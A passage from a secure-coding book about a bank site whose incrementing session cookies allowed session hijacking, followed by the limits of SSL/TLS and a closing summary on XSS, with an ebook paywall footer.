The best way to explain this is by way of a story. I was asked to pass a cursory eye over a Web site created by a bank. The bank used cookies to support the user’s sessions. Remember that HTTP is a stateless protocol, so many Web sites use cookies to provide a stateful connection. RFC 2965, "HTTP State Management Mechanism," (http://www.ietf.org/rfc/rfc2965.txt) outlines how to use cookies in this manner.

The user maintained a list of tasks at the bank’s Web server akin to a commerce site’s shopping cart. If an attacker can guess the cookie, she can hijack the connection and manipulate the user’s banking tasks, including moving money between accounts. I asked the developers how the cookies were protected from attack. The answer was not what I wanted but is very common: "We use SSL." In this case, SSL would not help because the cookies were predictable. In fact, they were simply 32-bit hexadecimal values incrementing by one for each newly connected user. As an attacker, I simply connect to the site by using SSL and look at the cookie sent by the Web server to my client. Let’s say it’s 0005F1CC. I then quickly access the site again from a different session or computer, and let’s say this time the cookie is 0005F1CE. I do it again and get 0005F1CF. It’s obvious what’s going on: the cookie value is incrementing, and it looks like someone accessed the site between my first two connections and has a cookie valued 0005F1CD. At any point, I can create a new connection to the Web site and, by using the Cookie: header, set the cookie to 0005F1CD or any other value prior to my first connection cookie and hijack another user’s session. Then, potentially I can move funds around. Admittedly, I cannot choose my victim, but a disgruntled customer could be a huge loss for the bank, and of course the privacy implications of such an attack are serious.

The remedy and the moral of this story: make the cookies used for high-security situations unpredictable. In this case, the bank started creating cookies by using a good random number generator, which is discussed in Chapter 8. Also, do not rely on SSL, our next subject, to protect you from all attacks.

SSL/TLS Client Issues

I’ve lost count of how many times I’ve heard designers and developers believe they are secure from attack because they use that good old silver bullet called SSL. SSL or, more accurately, TLS as it’s now called, helps mitigate some threats but not all. By default, the protocol provides

  • Server authentication.

  • On-the-wire privacy using encryption.

  • On-the-wire integrity using message authentication codes.

It can also provide client authentication, but this option is not often used. The protocol does not provide the following:

  • Protection from application design and coding flaws. If you have a buffer overrun in your code, you still have a buffer overrun when using SSL/TLS.

  • Protection for the data once it leaves the secured connection.

You should also be aware that when a client application connects to a server by using SSL/TLS, the connection is protected before any other higher-level protocol data is transferred.

Finally, when connecting to a server, the client application should verify that the server name is the same as the common name in the X.509 certificate used by the server, that the certificate is well-formed and valid, and that it has not expired. By default, WinInet, WinHTTP, and the .NET Framework’s System.Net will automatically verify these for you. You can turn these checks off, but it is highly discouraged.

Summary

Because of XSS bugs, Web input is dangerous, especially for your users and your reputation. Don’t trust any input from the user; always look for well-formed data, and reject everything else. If you are paranoid, you should consider adding extra defensive mechanisms to your Web pages. Don’t just focus on dynamic Web content; you should review all HTML and HTML-like files for XSS bugs.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.117.78.237